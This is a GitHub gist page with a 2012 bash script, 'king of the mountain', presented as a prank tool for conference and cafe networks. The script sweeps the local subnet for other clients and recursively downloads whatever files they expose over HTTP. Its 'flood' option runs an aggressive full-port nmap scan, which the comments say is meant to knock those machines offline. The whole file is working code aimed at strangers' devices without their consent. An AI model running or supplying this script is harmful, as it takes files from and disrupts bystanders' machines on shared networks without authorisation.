Created
September 28, 2012 18:57
-
-
Save philcryer/3801537 to your computer and use it in GitHub Desktop.
king of the mountain - because sharing is for faceb00k
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # king of the mountain - because sharing is for faceb00k | |
| # * networking fun for geeks in conferences and cafes | |
| # * find other clients on the local network | |
| # * see if they have any exposed files via http | |
| # * use nmap to attempt to knock them offline | |
| # - OSX or Linux supported (nmap, wget required) | |
| # - this script derived from manual steps I used to take | |
| # when I was bored at conferences, what else can/should | |
| # this script do? feedback appreciated | |
| # - thanks and <3 from @fak3r | |
| # Distributed under the terms of the BSD License. | |
| # Copyright (c) 2012 Phil Cryer phil@philcryer.com | |
| set -e | |
| ########################################################### | |
| ## initial configuration | |
| ########################################################### | |
| #assuming you're on linux or osx | |
| if [ `uname` == "Linux" ]; then | |
| IP=`ip -4 -o addr | awk '!/^[0-9]*: ?lo|link\/ether/ {gsub("/", " "); print $2" "$4}' | cut -d" " -f2` | |
| echo $IP | |
| else | |
| IP=`ifconfig | grep "inet" | grep -v '127.0.0.1' | cut -d":" -f2 | cut -d" " -f2 | tail -n1` | |
| echo $IP | |
| fi | |
| SUBNET=`echo ${IP} | cut -d'.' -f1,2,3` | |
| TMP_DIR="/tmp/king" | |
| OUT_DIR=${TMP_DIR}/`echo ${IP}|cut -d"." -f1,2` | |
| echo " * Checking for required programs..." | |
| req_progs=(nmap wget) | |
| for p in ${req_progs[@]}; do | |
| hash "$p" 2>&- || \ | |
| { echo >&2 " Required program \"$p\" not installed."; exit 1; } | |
| done | |
| echo " * Setting up the temporary directory..." >&2 | |
| if [ ! -d ${TMP_DIR} ]; then | |
| mkdir ${TMP_DIR} | |
| echo " * Created ${TMP_DIR}..." >&2 | |
| else | |
| echo " * Not creating, ${TMP_DIR} already exists..." >&2 | |
| fi | |
| ########################################################### | |
| ## functions | |
| ########################################################### | |
| function doipaudit() { | |
| echo -n " * auditing network for live IPs..." | |
| nmap -sP ${SUBNET}.0/24 > ${TMP_DIR}/ipaudit.raw | |
| echo "done" | |
| echo -n " * generating list..." | |
| echo ${IP} | |
| cat ${TMP_DIR}/ipaudit.raw | grep "Nmap scan report" | cut -d" " -f5 | grep -v "${IP}" > /tmp/king/ipaudit.up | |
| cat ${TMP_DIR}/ipaudit.up | sed 's/^/http\:\/\//' > ${TMP_DIR}/ipaudit.url | |
| echo "done"; sleep 2 | |
| menu | |
| } | |
| function doipshow() { | |
| if [ -f "${TMP_DIR}/ipaudit.raw" ]; then | |
| echo `cat ${TMP_DIR}/ipaudit.up` | |
| else | |
| echo "File ${TMP_DIR}/ipaudit.up not found, run Audit first" | |
| fi | |
| echo "done"; sleep 2 | |
| menu | |
| } | |
| function doipclean() { | |
| echo " -n * Cleaning the temporary directory..." >&2 | |
| rm -rf ${TMP_DIR}/ipaudit.* | |
| echo "done"; sleep 2 | |
| menu | |
| } | |
| function dowebgrab() { | |
| echo "Downloading found files..." | |
| cd ${TMP_DIR}; wget -r --input-file=/tmp/king/ipaudit.url --background --connect-timeout=5 | |
| echo "running, check ${TMP_DIR}/IP for files"; sleep 2 | |
| menu | |
| } | |
| function doipflood() { | |
| echo "Running through list..." | |
| cd ${TMP_DIR}; nmap -P0 -T Agressive -p 1- -iL ipaudit.up | |
| echo "running, will nmap IPs in the background"; sleep 2 | |
| menu | |
| } | |
| function donukefiles() { | |
| echo "Removing any downloaded files..." | |
| rm -rf ${OUT_DIR}* | |
| echo "done"; sleep 2 | |
| menu | |
| } | |
| ########################################################### | |
| ## menu | |
| ########################################################### | |
| function menu() { | |
| clear | |
| echo " King of the mountain - because sharing is for faceb00k" | |
| touch ${TMP_DIR}/ipaudit.raw | |
| touch ${TMP_DIR}/ipaudit.up | |
| touch ${TMP_DIR}/ipaudit.url | |
| if [ ! -d '${OUT_DIR}' ]; then | |
| mkdir -p ${OUT_DIR} | |
| fi | |
| echo "$(tput setaf 2)+---------------------------------------------------------------+" | |
| echo "| $(tput setaf 1)IP$(tput sgr0) ${IP} $(tput setaf 1)Targets$(tput sgr0)`cat ${TMP_DIR}/ipaudit.up | wc -l` $(tput setaf 1)Files$(tput sgr0)`find ${OUT_DIR}*|wc -l` $(tput setaf 2)|" | |
| echo "$(tput setaf 2)+---------------------------------------------------------------+" | |
| echo " $(tput setaf 1)($(tput setaf 3) i $(tput setaf 1)) $(tput sgr0) run an IP audit on the network" | |
| echo " $(tput setaf 1)($(tput setaf 3) s $(tput setaf 1)) $(tput sgr0) show live IPs on the network" | |
| echo " $(tput setaf 1)($(tput setaf 3) w $(tput setaf 1)) $(tput sgr0) do a web grab across live IPs" | |
| echo " $(tput setaf 1)($(tput setaf 3) f $(tput setaf 1)) $(tput sgr0) flood available IPs with packets" | |
| echo " $(tput setaf 1)($(tput setaf 3) n $(tput setaf 1)) $(tput sgr0) nuke all grabbed files" | |
| echo " $(tput setaf 1)($(tput setaf 3) c $(tput setaf 1)) $(tput sgr0) clean live IPs list" | |
| echo " $(tput setaf 1)($(tput setaf 3) b $(tput setaf 1)) $(tput sgr0) bye" | |
| read choice | |
| case $choice in | |
| i) | |
| doipaudit;; | |
| s) | |
| doipshow;; | |
| w) | |
| dowebgrab;; | |
| f) | |
| doipflood;; | |
| n) | |
| donukefiles;; | |
| c) | |
| doipclean;; | |
| b) | |
| exit 0;; | |
| *) | |
| menu;; | |
| esac | |
| } | |
| ########################################################### | |
| ## program | |
| ########################################################### | |
| menu | |
| exit 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment